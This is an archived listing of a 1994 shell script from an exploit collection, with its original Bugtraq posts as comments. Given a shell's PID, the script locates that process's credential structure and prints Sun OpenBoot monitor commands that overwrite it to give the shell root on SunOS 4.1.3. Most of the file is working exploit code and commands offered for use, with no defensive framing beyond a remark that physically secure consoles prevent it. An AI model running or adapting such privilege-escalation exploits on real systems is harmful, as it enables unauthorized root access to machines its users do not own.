home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / console.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  3KB  |  91 lines

  1. #!/bin/sh - 
  2. #
  3. #**************************************************************************
  4. #   HACK: Use monitor on console to poke holes in memory & obtain root
  5. # System: Unix, Sun 4.1.3
  6. # Source: Bugtraq
  7. #**************************************************************************
  8. #
  9. # From: an100188@anon.penet.fi
  10. # Subject: Breaking in from the monitor at the console
  11. # Date: Fri, 27 May 1994 15:34:36 UTC
  12. # To: bugtraq@crimelab.com
  13. # Breaking into a machine, typically a workstation, by using the monitor
  14. # at the console to poke values into memory has always been possible.  I
  15. # didn't realize how simple and unobtrusive it was before I saw this
  16. # script.  This one is for Suns, but the principle applies to any
  17. # machine with a console monitor.  On Sun4s there is some sort of
  18. # "secure mode" that I presume lets you disable the monitor.  It is
  19. # possible to change the L1-A sequence to another pair of keys, but if
  20. # you own /dev/console you can change it back.  This obscurity may or
  21. # may not be useful.
  22. # This particular attack needs a way to run the script on the machine,
  23. # typically in a shell.  I presume there are other spots where you could
  24. # tickle a machine that don't even require that.  Physically secure
  25. # consoles prevent this attack.
  26. # Sigh.
  27. #
  28. # ----------------------------------------------------------------------------
  29. #
  30. # Subject: Re: Breaking in from the monitor at the console
  31. # Date: Sat, 28 May 1994 10:15:52 UTC
  32. # To: bugtraq@crimelab.com
  33. # Oops, someone pointed out that the script was deleted by the anonymous
  34. # mail signature-remover.  Sorry about that.  Here's the script:
  35. # Program: fc-4.1.3
  36. # Author: Anonymous
  37. # Usage: fc-4.1.3 PID
  38. #       PID is the PID of the shell you wish to give root to.
  39. #
  40. # Description:
  41. #       Tell people how to give themselves root (on SunOS 4.1.3 machines)
  42. #
  43.  
  44. # Give the program a known path
  45. PATH="/bin:/usr/etc:/usr/ucb"
  46. export PATH
  47.  
  48. if [ $1x = x ]; then 
  49. cat - << EOF
  50. Usage: $0 PID
  51.         Where PID is the PID of the shell you want to give root to.
  52.  
  53. Note - for csh the PID is stored in \$\$.
  54. EOF
  55.         exit 1
  56. fi
  57.  
  58. # This is the start of the proc structure for a given PID.
  59. procp=`pstat -u $1 | grep procp | cut -f2`
  60.  
  61. # This is really the only important information here.
  62. # This number is the offset of the pointer to the cred structure 
  63. # in the proc structure.
  64. ucred="4c"
  65.  
  66. cat - << EOF
  67. On the console press '<L1>a', you should see then see the following message:
  68.         Type  'go' to resume
  69.         ok 
  70.  
  71. type the following at the 'ok' prompt:
  72.         b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
  73.         go
  74.  
  75. Notes: 
  76.         * On some sun keyboards the '<L1>' key is labeled 'Stop'.
  77.         * There is Emacs style line editing available at the 'ok' prompt.
  78. EOF
  79.  
  80. exit 0
  81.  
  82.  
  83.  
  84. #                 www.hack.co.za           [2000]#